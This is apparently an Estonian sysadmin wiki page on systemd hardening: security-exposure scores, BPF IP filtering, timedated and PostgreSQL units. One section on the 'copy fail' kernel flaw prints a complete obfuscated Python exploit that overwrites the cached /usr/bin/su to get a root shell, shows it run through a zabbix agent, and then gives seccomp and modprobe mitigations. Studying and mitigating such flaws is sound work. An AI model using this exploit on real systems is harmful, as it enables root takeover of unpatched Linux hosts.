✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (arvuti mälu)

|
v

vfs (virtual file system) (arvuti mälu)

|
v

page cache (arvuti mälu)

|
v

ext4 filesystem (plokkseade)

|
v

plokkseade (füüsiline ese)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-05-02T10:03:14Z

Imre: /* Leevendus - modprobe */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

